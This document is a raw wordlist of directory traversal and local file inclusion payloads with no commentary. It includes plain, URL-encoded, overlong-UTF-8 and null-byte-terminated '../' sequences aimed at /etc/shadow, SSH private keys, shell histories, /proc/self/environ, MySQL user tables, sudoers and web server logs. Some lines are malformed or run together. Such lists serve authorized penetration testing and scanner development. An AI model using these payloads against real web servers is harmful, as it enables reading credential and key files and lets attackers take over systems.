../../../../../../../etc/passwd
../../../../../../../etc/shadow
../../../../../../../etc/aliases
../../../../../../../etc/anacrontab
../../../../../../../etc/apache2/apache2.conf
../../../../../../../etc/apache2/httpd.conf
../../../../../../../etc/at.allow
../../../../../../../etc/at.deny
../../../../../../../etc/bashrc
../../../../../../../etc/bootptab
../../../../../../../etc/chrootUsers
../../../../../../../etc/chttp.conf
../../../../../../../etc/cron.allow
../../../../../../../etc/cron.deny
../../../../../../../etc/crontab
../../../../../../../etc/cups/cupsd.conf
../../../../../../../etc/exports
../../../../../../../etc/fstab
../../../../../../../etc/ftpaccess
../../../../../../../etc/ftpchroot
../../../../../../../etc/ftphosts
../../../../../../../etc/groups
../../../../../../../etc/grub.conf
../../../../../../../etc/hosts
../../../../../../../etc/hosts.allow
../../../../../../../etc/hosts.deny
../../../../../../../etc/httpd/access.conf
../../../../../../../etc/httpd/conf/httpd.conf
../../../../../../../etc/httpd/httpd.conf
../../../../../../../etc/httpd/logs/access_log
../../../../../../../etc/httpd/logs/access.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../etc/httpd/php.ini
../../../../../../../etc/httpd/srm.conf
../../../../../../../etc/inetd.conf
../../../../../../../etc/inittab
../../../../../../../etc/issue
../../../../../../../etc/lighttpd.conf
../../../../../../../etc/lilo.conf
../../../../../../../etc/logrotate.d/ftp
../../../../../../../etc/logrotate.d/proftpd
../../../../../../../etc/logrotate.d/vsftpd.log
../../../../../../../etc/lsb-release
../../../../../../../etc/motd
../../../../../../../etc/modules.conf
../../../../../../../etc/mtab
../../../../../../../etc/my.cnf
../../../../../../../etc/my.conf
../../../../../../../etc/mysql/my.cnf
../../../../../../../etc/network/interfaces
../../../../../../../etc/networks
../../../../../../../etc/npasswd
../../../../../../../etc/php4.4/fcgi/php.ini
../../../../../../../etc/php4/apache2/php.ini
../../../../../../../etc/php4/apache/php.ini
../../../../../../../etc/php4/cgi/php.ini
../../../../../../../etc/php5/apache2/php.ini
../../../../../../../etc/php5/apache/php.ini
../../../../../../../etc/php/apache2/php.ini
../../../../../../../etc/php/apache/php.ini
../../../../../../../etc/php/cgi/php.ini
../../../../../../../etc/php.ini
../../../../../../../etc/php/php4/php.ini
../../../../../../../etc/php/php.ini
../../../../../../../etc/printcap
../../../../../../../etc/profile
../../../../../../../etc/proftp.conf
../../../../../../../etc/proftpd/proftpd.conf
../../../../../../../etc/pure-ftpd.conf
../../../../../../../etc/pureftpd.passwd
../../../../../../../etc/pureftpd.pdb
../../../../../../../etc/pure-ftpd/pure-ftpd.conf
../../../../../../../etc/pure-ftpd/pure-ftpd.pdb
../../../../../../../etc/pure-ftpd/putreftpd.pdb
../../../../../../../etc/redhat-release
../../../../../../../etc/resolv.conf
../../../../../../../etc/samba/smb.conf
../../../../../../../etc/snmpd.conf
../../../../../../../etc/ssh/ssh_config
../../../../../../../etc/ssh/sshd_config
../../../../../../../etc/ssh/ssh_host_dsa_key
../../../../../../../etc/ssh/ssh_host_dsa_key.pub
../../../../../../../etc/ssh/ssh_host_key
../../../../../../../etc/ssh/ssh_host_key.pub
../../../../../../../etc/sysconfig/network
../../../../../../../etc/syslog.conf
../../../../../../../etc/termcap
../../../../../../../etc/vhcs2/proftpd/proftpd.conf
../../../../../../../etc/vsftpd.chroot_list
../../../../../../../etc/vsftpd.conf
../../../../../../../etc/vsftpd/vsftpd.conf
../../../../../../../etc/wu-ftpd/ftpaccess
../../../../../../../etc/wu-ftpd/ftphosts
../../../../../../../etc/wu-ftpd/ftpusers
../../../../../../../logs/pure-ftpd.log
../../../../../../../logs/security_debug_log
../../../../../../../logs/security_log
../../../../../../../opt/lampp/etc/httpd.conf
../../../../../../../opt/xampp/etc/php.ini
../../../../../../../proc/cpuinfo
../../../../../../../proc/filesystems
../../../../../../../proc/interrupts
../../../../../../../proc/ioports
../../../../../../../proc/meminfo
../../../../../../../proc/modules
../../../../../../../proc/mounts
../../../../../../../proc/stat
../../../../../../../proc/swaps
../../../../../../../proc/version
../../../../../../../proc/self/net/arp
../../../../../../../root/anaconda-ks.cfg
../../../../../../../usr/etc/pure-ftpd.conf
../../../../../../../usr/lib/php.ini
../../../../../../../usr/lib/php/php.ini
../../../../../../../usr/local/apache/conf/modsec.conf
../../../../../../../usr/local/apache/conf/php.ini
../../../../../../../usr/local/apache/log
../../../../../../../usr/local/apache/logs
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../usr/local/apache/audit_log
../../../../../../../usr/local/apache/error_log
../../../../../../../usr/local/apache/error.log
../../../../../../../usr/local/cpanel/logs
../../../../../../../usr/local/cpanel/logs/access_log
../../../../../../../usr/local/cpanel/logs/error_log
../../../../../../../usr/local/cpanel/logs/license_log
../../../../../../../usr/local/cpanel/logs/login_log
../../../../../../../usr/local/cpanel/logs/stats_log
../../../../../../../usr/local/etc/httpd/logs/access_log
../../../../../../../usr/local/etc/httpd/logs/error_log
../../../../../../../usr/local/etc/php.ini
../../../../../../../usr/local/etc/pure-ftpd.conf
../../../../../../../usr/local/etc/pureftpd.pdb
../../../../../../../usr/local/lib/php.ini
../../../../../../../usr/local/php4/httpd.conf
../../../../../../../usr/local/php4/httpd.conf.php
../../../../../../../usr/local/php4/lib/php.ini
../../../../../../../usr/local/php5/httpd.conf
../../../../../../../usr/local/php5/httpd.conf.php
../../../../../../../usr/local/php5/lib/php.ini
../../../../../../../usr/local/php/httpd.conf
../../../../../../../usr/local/php/httpd.conf.ini
../../../../../../../usr/local/php/lib/php.ini
../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf
../../../../../../../usr/local/pureftpd/etc/pureftpd.pdn
../../../../../../../usr/local/pureftpd/sbin/pure-config.pl
../../../../../../../usr/local/www/logs/httpd_log
../../../../../../../usr/local/Zend/etc/php.ini
../../../../../../../usr/sbin/pure-config.pl
../../../../../../../var/adm/log/xferlog
../../../../../../../var/apache2/config.inc
../../../../../../../var/apache/logs/access_log
../../../../../../../var/apache/logs/error_log
../../../../../../../var/cpanel/cpanel.config
../../../../../../../var/lib/mysql/my.cnf
../../../../../../../var/lib/mysql/mysql/user.MYD
../../../../../../../var/local/www/conf/php.ini
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache-ssl/access.log
../../../../../../../var/log/apache-ssl/error.log
../../../../../../../var/log/auth.log
../../../../../../../var/log/boot
../../../../../../../var/htmp
../../../../../../../var/log/chttp.log
../../../../../../../var/log/cups/error.log
../../../../../../../var/log/daemon.log
../../../../../../../var/log/debug
../../../../../../../var/log/dmesg
../../../../../../../var/log/dpkg.log
../../../../../../../var/log/exim_mainlog
../../../../../../../var/log/exim/mainlog
../../../../../../../var/log/exim_paniclog
../../../../../../../var/log/exim.paniclog
../../../../../../../var/log/exim_rejectlog
../../../../../../../var/log/exim/rejectlog
../../../../../../../var/log/faillog
../../../../../../../var/log/ftplog
../../../../../../../var/log/ftp-proxy
../../../../../../../var/log/ftp-proxy/ftp-proxy.log
../../../../../../../var/log/httpd/access_log
../../../../../../../var/log/httpd/access.log
../../../../../../../var/log/httpd/error_log
../../../../../../../var/log/httpd/error.log
../../../../../../../var/log/httpsd/ssl.access_log
../../../../../../../var/log/httpsd/ssl_log
../../../../../../../var/log/kern.log
../../../../../../../var/log/lastlog
../../../../../../../var/log/lighttpd/access.log
../../../../../../../var/log/lighttpd/error.log
../../../../../../../var/log/lighttpd/lighttpd.access.log
../../../../../../../var/log/lighttpd/lighttpd.error.log
../../../../../../../var/log/mail.info
../../../../../../../var/log/mail.log
../../../../../../../var/log/maillog
../../../../../../../var/log/mail.warn
../../../../../../../var/log/message
../../../../../../../var/log/messages
../../../../../../../var/log/mysqlderror.log
../../../../../../../var/log/mysql.log
../../../../../../../var/log/mysql/mysql-bin.log
../../../../../../../var/log/mysql/mysql.log
../../../../../../../var/log/mysql/mysql-slow.log
../../../../../../../var/log/proftpd
../../../../../../../var/log/pureftpd.log
../../../../../../../var/log/pure-ftpd/pure-ftpd.log
../../../../../../../var/log/secure
../../../../../../../var/log/vsftpd.log
../../../../../../../var/log/wtmp
../../../../../../../var/log/xferlog
../../../../../../../var/log/yum.log
../../../../../../../var/mysql.log
../../../../../../../var/run/utmp
../../../../../../../var/spool/cron/crontabs/root
../../../../../../../var/webmin/miniserv.log
../../../../../../../var/www/log/access_log
../../../../../../../var/www/log/error_log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/access.log
../../../../../../../var/www/logs/error.log
../../../../../../..~/.atfp_history
../../../../../../..~/.bash_history
../../../../../../..~/.bash_logout
../../../../../../..~/.bash_profile
../../../../../../..~/.bashrc
../../../../../../..~/.gtkrc
../../../../../../..~/.login
../../../../../../..~/.logout
../../../../../../..~/.mysql_history
../../../../../../..~/.nano_history
../../../../../../..~/.php_history
../../../../../../..~/.profile
../../../../../../..~/.ssh/authorized_keys
../../../../../../..~/.ssh/id_dsa
../../../../../../..~/.ssh/id_dsa.pub
../../../../../../..~/.ssh/id_rsa
../../../../../../..~/.ssh/id_rsa.pub
../../../../../../..~/.ssh/identity
../../../../../../..~/.ssh/identity.pub
../../../../../../..~/.viminfo
../../../../../../..~/.wm_style
../../../../../../..~/.Xdefaults
../../../../../../..~/.xinitrc
../../../../../../..~/.Xresources
../../../../../../..~/.xsession
../../../../../../../usr/local/cpanel/logs%00
../../../../../../../usr/local/cpanel/logs/stats_log%00
../../../../../../../usr/local/cpanel/logs/access_log%00
../../../../../../../usr/local/cpanel/logs/error_log%00
../../../../../../../usr/local/cpanel/logs/license_log%00
../../../../../../../usr/local/cpanel/logs/login_log%00
../../../../../../../var/cpanel/cpanel.config%00
../../../../../../../var/log/mysql/mysql-bin.log%00
../../../../../../../var/log/mysql.log%00
../../../../../../../var/log/mysqlderror.log%00
../../../../../../../var/log/mysql/mysql.log%00
../../../../../../../var/log/mysql/mysql-slow.log%00
../../../../../../../var/mysql.log%00
../../../../../../../var/lib/mysql/my.cnf%00
../../../../../../../etc/mysql/my.cnf%00
../../../../../../../etc/my.cnf%00
../../../../../../../etc/logrotate.d/proftpd%00
../../../../../../../www/logs/proftpd.system.log%00
../../../../../../../var/log/proftpd%00
../../../../../../../etc/proftp.conf%00
../../../../../../../etc/protpd/proftpd.conf%00
../../../../../../../etc/vhcs2/proftpd/proftpd.conf%00
../../../../../../../etc/proftpd/modules.conf%00
../../../../../../../var/log/vsftpd.log%00
../../../../../../../etc/vsftpd.chroot_list%00
../../../../../../../etc/logrotate.d/vsftpd.log%00
../../../../../../../etc/vsftpd/vsftpd.conf%00
../../../../../../../etc/vsftpd.conf%00
../../../../../../../etc/chrootUsers%00
../../../../../../../var/log/xferlog%00
../../../../../../../var/adm/log/xferlog%00
../../../../../../../etc/wu-ftpd/ftpaccess%00
../../../../../../../etc/wu-ftpd/ftphosts%00
../../../../../../../etc/wu-ftpd/ftpusers%00
../../../../../../../usr/sbin/pure-config.pl%00
../../../../../../../usr/etc/pure-ftpd.conf%00
../../../../../../../etc/pure-ftpd/pure-ftpd.conf%00
../../../../../../../usr/local/etc/pure-ftpd.conf%00
../../../../../../../usr/local/etc/pureftpd.pdb%00
../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb%00
../../../../../../../usr/local/pureftpd/sbin/pure-config.pl%00
../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf%00
../../../../../../../etc/pure-ftpd.conf%00
../../../../../../../etc/pure-ftpd/pure-ftpd.pdb%00
../../../../../../../etc/pureftpd.pdb%00
../../../../../../../etc/pureftpd.passwd%00
../../../../../../../etc/pure-ftpd/pureftpd.pdb%00
../../../../../../../usr/ports/ftp/pure-ftpd/%00
../../../../../../../usr/ports/net/pure-ftpd/%00
../../../../../../../usr/pkgsrc/net/pureftpd/%00
../../../../../../../usr/ports/contrib/pure-ftpd/%00
../../../../../../../var/log/pure-ftpd/pure-ftpd.log%00
../../../../../../../logs/pure-ftpd.log%00
../../../../../../../var/log/pureftpd.log%00
../../../../../../../var/log/ftp-proxy/ftp-proxy.log%00
../../../../../../../var/log/ftp-proxy%00
../../../../../../../var/log/ftplog%00
../../../../../../../etc/logrotate.d/ftp%00
../../../../../../../etc/ftpchroot%00
../../../../../../../etc/ftphosts%00
../../../../../../../var/log/exim_mainlog%00
../../../../../../../var/log/exim/mainlog%00
../../../../../../../var/log/maillog%00
../../../../../../../var/log/exim_paniclog%00
../../../../../../../var/log/exim/paniclog%00
../../../../../../../var/log/exim/rejectlog%00
../../../../../../../var/log/exim_rejectlog%00/etc/issue
../../../../../../../etc/group
../../../../../../../etc/security/group
../../../../../../../etc/security/passwd
../../../../../../../etc/security/user
../../../../../../../etc/security/environ
../../../../../../../etc/security/limits
../../../../../../../usr/lib/security/mkuser.default
../../../../../../../apache/logs/error.log
../../../../../../../apache/logs/access.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../apache2/logs/error.log
../../../../../../../apache2/logs/access.log
../../../../../../../bin/php.ini
../../../../../../../web/conf/php.ini
../../../../../../../etc/php5/cgi/php.ini
../../../../../../../var/log/exim/paniclog
../../../../../../../var/log/exim_rejectlog/etc/passwd
../../../../../../../logs/error.log
../../../../../../../logs/access.log
../../../../../../../logs/error_log
../../../../../../../logs/access_log
../../../../../../../usr/local/apache2/logs/access_log
../../../../../../../usr/local/apache2/logs/access.log
../../../../../../../usr/local/apache2/logs/error_log
../../../../../../../usr/local/apache2/logs/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
../../../../../../../var/www/mgr/logs/error_log
../../../../../../../var/www/mgr/logs/error.log
../../../../../../../var/www/mgr/logs/access_log
../../../../../../../var/www/mgr/logs/access.log
../../../../../../../opt/lampp/logs/access_log
../../../../../../../opt/lampp/logs/access.log
../../../../../../../opt/lampp/logs/error_log
../../../../../../../opt/lampp/logs/error.log
../../../../../../../opt/xampp/logs/access_log
../../../../../../../opt/xampp/logs/access.log
../../../../../../../opt/xampp/logs/error_log
../../../../../../../opt/xampp/logs/error.log
../../../../../../../etc/hostname
../../../../../../../etc/cron.d/
../../../../../../../etc/httpd/conf.d/
../../../../../../../etc/apache2/conf/httpd.conf
../../../../../../../etc/apache2/conf.d/
../../../../../../../etc/nginx/nginx.conf
../../../../../../../etc/nginx/conf.d/
../../../../../../../etc/php7/apache2/php.ini
../../../../../../../var/www/html/index.php
../../../../../../../var/www/html/config.php
../../../../../../../var/log/nginx/access.log
../../../../../../../var/log/nginx/error.log
../../../../../../../var/log/mysql/error.log
../../../../../../../var/log/boot.log
../../../../../../../var/log/syslog
../../../../../../../proc/self/environ
../../../../../../../proc/self/cmdline
../../../../../../../proc/self/status
../../../../../../../proc/net/arp
../../../../../../../proc/net/route
../../../../../../../proc/net/tcp
../../../../../../../proc/net/udp
../../../../../../../proc/net/if_inet6
../../../../../../../proc/net/dev
../../../../../../../root/.bash_history
../../../../../../../root/.ssh/authorized_keys
../../../../../../../root/.ssh/id_rsa
../../../../../../../root/.ssh/id_rsa.pub
../../../../../../../root/.ssh/known_hosts
../../../../../../../home/user/.bashrc
../../../../../../../home/user/.bash_profile
../../../../../../../home/user/.bash_logout
../../../../../../../home/user/.ssh/authorized_keys
../../../../../../../home/user/.ssh/id_rsa
../../../../../../../home/user/.ssh/id_rsa.pub
../../../../../../../home/user/.ssh/known_hosts
../../../../../../../usr/local/apache2/conf/httpd.conf
../../../../../../../usr/local/nginx/conf/nginx.conf
../../../../../../../usr/local/mysql/my.cnf
../../../../../../../var/lib/mysql/mysql/user.frm
../../../../../../../var/lib/mysql/mysql/user.MYI
../../../../../../../boot/grub/grub.cfg
../../../../../../../boot/grub/menu.lst
../../../../../../../boot/vmlinuz
../../../../../../../boot/initrd.img
../../../../../../../boot/System.map
../../../../../../../etc/apt/sources.list
../../../../../../../etc/sudoers
../../../../../../../etc/sudoers.d/README
../../../../../../../etc/logrotate.conf
../../../../../../../etc/logrotate.d/
../../../../../../../etc/xinetd.conf
../../../../../../../etc/xinetd.d/
../../../../../../../var/spool/cron/crontabs/user
../../../../../../../var/lib/dhcp/dhclient.leases
../../../../../../../var/mail/root
../../../../../../../var/mail/user
../../../../../../../var/spool/mail/root
../../../../../../../var/spool/mail/user
../../../../../../../etc/ld.so.conf
../../../../../../../etc/nsswitch.conf
../../../../../../../etc/pam.d/login
../../../../../../../etc/pam.d/sshd
../../../../../../../etc/security/limits.conf
../../../../../../../etc/environment
../../../../../../../etc/services
../../../../../../../etc/rc.local
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fshadow
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhostname
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fissue
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fmotd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fresolv%2econf
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fcron%2ed%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fcrontab
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fnetwork%2finterfaces
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fssh%2fssh%5fconfig
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fssh%2fsshd%5fconfig
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fmysql%2fmy%2ecnf
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhttpd%2fconf%2fhttpd%2econf
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhttpd%2fconf%2ed%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fapache2%2fapache2%2econf
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fapache2%2fconf%2fhttpd%2econf
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fapache2%2fconf%2ed%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fnginx%2fnginx%2econf
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fnginx%2fconf%2ed%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2eini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp5%2fapache2%2fphp%2eini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp7%2fapache2%2fphp%2eini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2fwww%2fhtml%2findex%2ephp
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2fwww%2fhtml%2fconfig%2ephp
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fapache2%2faccess%2elog
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fapache2%2ferror%2elog
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fnginx%2faccess%2elog
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fnginx%2ferror%2elog
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fmysql%2ferror%2elog
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fauth%2elog
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fboot%2elog
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fdmesg
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fkern%2elog
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fsyslog
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fmessages
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fcpuinfo
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fmeminfo
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fself%2fcmdline
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fself%2fstatus
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fversion
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fnet%2farp
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fnet%2froute
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fnet%2ftcp
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fnet%2fudp
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fnet%2fif%5finet6
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fnet%2fdev
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fmounts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fswaps
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2froot%2f%2ebash%5fhistory
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2froot%2f%2essh%2fauthorized%5fkeys
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2froot%2f%2essh%2fid%5frsa
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2froot%2f%2essh%2fid%5frsa%2epub
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2froot%2f%2essh%2fknown%5fhosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhome%2fuser%2f%2ebashrc
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhome%2fuser%2f%2ebash%5fprofile
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhome%2fuser%2f%2ebash%5flogout
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhome%2fuser%2f%2essh%2fauthorized%5fkeys
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhome%2fuser%2f%2essh%2fid%5frsa
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhome%2fuser%2f%2essh%2fid%5frsa%2epub
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhome%2fuser%2f%2essh%2fknown%5fhosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fusr%2flocal%2fapache2%2fconf%2fhttpd%2econf
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fusr%2flocal%2fetc%2fphp%2eini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fusr%2flocal%2fnginx%2fconf%2fnginx%2econf
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fusr%2flocal%2fmysql%2fmy%2ecnf
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flib%2fmysql%2fmysql%2fuser%2efrm
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flib%2fmysql%2fmysql%2fuser%2eMYD
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flib%2fmysql%2fmysql%2fuser%2eMYI
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot%2fgrub%2fgrub%2ecfg
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot%2fgrub%2fmenu%2elst
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot%2fvmlinuz
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot%2finitrd%2eimg
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot%2fSystem%2emap
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fapt%2fsources%2elist
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fsudoers
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fsudoers%2ed%2fREADME
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2flogrotate%2econf
.\..\..\..\..\..\..\..\..\..\boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini%00
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
..2fapache2flogs2ferror.log
..2fapache2flogs2faccess.log
..2f..2fapache2flogs2ferror.log
..2f..2fapache2flogs2faccess.log
..2f..2f..2fapache2flogs2ferror.log
..2f..2f..2fapache2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log..2fetc2fpasswd
..2fetc2fpasswd%00
..2f..2fetc2fpasswd
..2f..2fetc2fpasswd%00
..2f..2f..2fetc2fpasswd
..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
